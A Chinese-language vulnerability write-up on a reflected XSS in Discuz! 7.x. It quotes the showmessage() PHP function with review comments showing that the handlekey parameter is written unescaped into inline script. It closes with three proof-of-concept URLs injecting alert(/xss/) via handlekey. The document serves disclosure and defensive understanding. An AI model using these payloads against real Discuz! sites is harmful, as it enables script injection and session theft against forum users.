
Discuz! 7.x 反射型xss


引用:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-084097.html

在 /include/global.func.php 文件的第 1036-1119 行中:

// Render a status/notice message to the user (optionally with a redirect), log it, and terminate.
//
// Listing as reproduced in the write-up: the quote characters appear as ‘ (U+2018) because of the
// page's encoding; in the actual source they are presumably plain ASCII quotes.
//
// Parameters:
//   $message      - message key (looked up in the language tables) or literal text to show.
//   $url_forward  - URL to redirect/forward to after showing the message ('' = no forward).
//   $extra        - extra mode flag; 'HALTED' / 'NOPERM' select the "no permission" handling.
//   $forwardtype  - when non-zero, forces a non-zero refresh delay (default 3 s) for the forward.
// Never returns: ends with dexit().
//
// Security notes (review):
//   - extract($GLOBALS, EXTR_SKIP) below pulls every global into local scope. Several variables used
//     later ($handlekey, $infloat, $quickforward, $transsidstatus, $funcstatinfo, $globaladvs,
//     $redirectadvs, $_DCOOKIE) only come into scope this way. Per the write-up, $handlekey and
//     $infloat are request-controlled (URL parameters) on the affected entry points.
//   - $handlekey is interpolated, unquoted and unescaped, into inline JavaScript (see the
//     $handlekey branch below); this is the reflected XSS the write-up describes.
function showmessage($message, $url_forward = ‘‘, $extra = ‘‘, $forwardtype = 0) {
	// Imports all globals as locals (existing locals win). See header note on what this brings in.
	extract($GLOBALS, EXTR_SKIP);
	global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;
	define(‘CACHE_FORBIDDEN‘, TRUE);
	$hookscriptmessage = $show_message = $message;$messagehandle = 0;
	// Forward settings come from the settings cache. unserialize() on cache content is only safe as long
	// as the cache is written exclusively by trusted code — NOTE(review): confirm $_DCACHE is never
	// populated from request data.
	$msgforward = unserialize($_DCACHE[‘settings‘][‘msgforward‘]);
	$refreshtime = intval($msgforward[‘refreshtime‘]);
	// A forced forward ($forwardtype != 0) always gets a delay; 3 s when none is configured.
	$refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
	$msgforward[‘refreshtime‘] = $refreshtime * 1000;	// stored in milliseconds for setTimeout()
	// Append the session id to the forward URL when cookies are unavailable and transsid is enabled.
	$url_forward = empty($url_forward) ? ‘‘ : (empty($_DCOOKIE[‘sid‘]) && $transsidstatus ? transsid($url_forward) : $url_forward);
	$seccodecheck = $seccodestatus & 2;
	// Function-usage statistics: appended to forumdata/funcstat.log under an exclusive lock.
	if($_DCACHE[‘settings‘][‘funcsiteid‘] && $_DCACHE[‘settings‘][‘funckey‘] && $funcstatinfo && !IS_ROBOT) {
		$statlogfile = DISCUZ_ROOT.‘./forumdata/funcstat.log‘;
		if($fp = @fopen($statlogfile, ‘a‘)) {
			@flock($fp, 2);	// 2 == LOCK_EX
			if(is_array($funcstatinfo)) {
				$funcstatinfo = array_unique($funcstatinfo);
				foreach($funcstatinfo as $funcinfo) {
					fwrite($fp, funcstat_query($funcinfo, $message)."\n");
				}
			} else {
				fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
			}
			fclose($fp);
			// Reset both the local copy and the global so the stats are not written twice.
			$funcstatinfo = $GLOBALS[‘funcstatinfo‘] = ‘‘;
		}
	}

	if(!defined(‘STAT_DISABLED‘) && STAT_ID > 0 && !IS_ROBOT) {
		write_statlog($message);
	}

	// Immediate redirect (no message page) when quick-forward is requested, or when the message is in
	// the configured quick-forward list for a non-AJAX request.
	// NOTE(review): the str_replace arguments are identical in this listing, which looks like an
	// artefact of the page rendering; the intent is presumably to unescape an HTML-encoded ampersand.
	if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward[‘quick‘] && $msgforward[‘messages‘] && @in_array($message, $msgforward[‘messages‘]))) {
		updatesession();
		dheader("location: ".str_replace(‘&‘, ‘&‘, $url_forward));
	}
	// In float (popup) mode the $extra flag is repurposed as the message handle passed to JS, and
	// therefore no longer selects the NOPERM/HALTED template below.
	if(!empty($infloat)) {
		if($extra) {
			$messagehandle = $extra;
		}
		$extra = ‘‘;
	}
	if(in_array($extra, array(‘HALTED‘, ‘NOPERM‘))) {
		$discuz_action = 254;
	} else {
		$discuz_action = 255;
	}

	include language(‘messages‘);

	// Resolve "$message" to display text: "script:key" form first, then the plain language table.
	// Both branches build PHP source from the language string and eval() it so that embedded
	// variables are interpolated. This executes the language file content as code — any
	// attacker-influenced text reaching $scriptlang/$language would be code execution, not just XSS.
	$vars = explode(‘:‘, $message);
	if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {
		eval("\$show_message = \"".str_replace(‘"‘, ‘\"‘, $scriptlang[$vars[0]][$vars[1]])."\";");
	} elseif(isset($language[$message])) {
		$pre = $inajax ? ‘ajax_‘ : ‘‘;	// AJAX requests prefer an "ajax_" variant of the message if present
		eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
		unset($pre);
	}

	if(empty($infloat)) {
		// Non-float mode: delayed client-side redirect. $url_forward is placed inside a JS string
		// literal without JS escaping; callers must only pass trusted URLs here.
		$show_message .= $url_forward && empty($inajax) ? ‘<script>setTimeout("window.location.href =\‘‘.$url_forward.‘\‘;", ‘.$msgforward[‘refreshtime‘].‘);</script>‘ : ‘‘;
	} elseif($handlekey) {
		// Float mode: hand the result to a page-side callback named after $handlekey.
		// Only $show_message has its single quotes escaped. $handlekey is dropped straight into the
		// script as a bare identifier fragment, and $messagehandle / $url_forward are inserted into
		// quoted JS strings, none of them escaped or validated. A request-controlled $handlekey is
		// therefore reflected into executable script (the XSS in this write-up).
		// Mitigation: reject or sanitise $handlekey to a strict identifier alphabet (e.g. [A-Za-z0-9_])
		// before it is used, and escape every value placed inside a JS string for the JS context.
		$show_message = str_replace("‘", "\‘", $show_message);
		if($url_forward) {
			$show_message = "<script type=\"text/javascript\" reload=\"1\">\nif($(‘return_$handlekey‘)) $(‘return_$handlekey‘).className = ‘onright‘;\nif(typeof submithandle_$handlekey ==‘function‘) {submithandle_$handlekey(‘$url_forward‘, ‘$show_message‘);} else {location.href=‘$url_forward‘}\n</script>";
		} else {
			$show_message .= "<script type=\"text/javascript\" reload=\"1\">\nif(typeof messagehandle_$handlekey ==‘function‘) {messagehandle_$handlekey(‘$messagehandle‘, ‘$show_message‘);}\n</script>";
		}
	}

	// Pick one random advertisement per ad type for the message/redirect page.
	// Note: the loop variable reuses $redirectadvs, which is clobbered afterwards.
	if($advlist = array_merge($globaladvs ? $globaladvs[‘type‘] : array(), $redirectadvs ? $redirectadvs[‘type‘] : array())) {
		$advitems = ($globaladvs ? $globaladvs[‘items‘] : array()) + ($redirectadvs ? $redirectadvs[‘items‘] : array());
		foreach($advlist AS $type => $redirectadvs) {
			$advlist[$type] = $advitems[$redirectadvs[array_rand($redirectadvs)]];
		}
	}

	if($extra == ‘NOPERM‘) {
		include template(‘nopermission‘);
	} else {
		include template(‘showmessage‘);
	}
	dexit();	// never returns
}

  在這段代碼中:

elseif($handlekey) {
		$show_message = str_replace("‘", "\‘", $show_message);
		if($url_forward) {
			$show_message = "<script type=\"text/javascript\" reload=\"1\">\nif($(‘return_$handlekey‘)) $(‘return_$handlekey‘).className = ‘onright‘;\nif(typeof submithandle_$handlekey ==‘function‘) {submithandle_$handlekey(‘$url_forward‘, ‘$show_message‘);} else {location.href=‘$url_forward‘}\n</script>";
		} else {
			$show_message .= "<script type=\"text/javascript\" reload=\"1\">\nif(typeof messagehandle_$handlekey ==‘function‘) {messagehandle_$handlekey(‘$messagehandle‘, ‘$show_message‘);}\n</script>";
		}
	}

  

如果不存在 $url_forward 參數，就會進入 else 分支；

然而這個 $handlekey 在拼接進 script 時並沒有加引號，也沒有任何轉義或過濾，所以不存在繞不繞過的問題，可以直接觸發。

漏洞url:

/admincp.php?infloat=yes&handlekey=123);alert(/xss/);//

/logging.php?infloat=yes&handlekey=123);alert(/xss/);//

/api/uchome.php?infloat=yes&handlekey=123);alert(/xss/);//
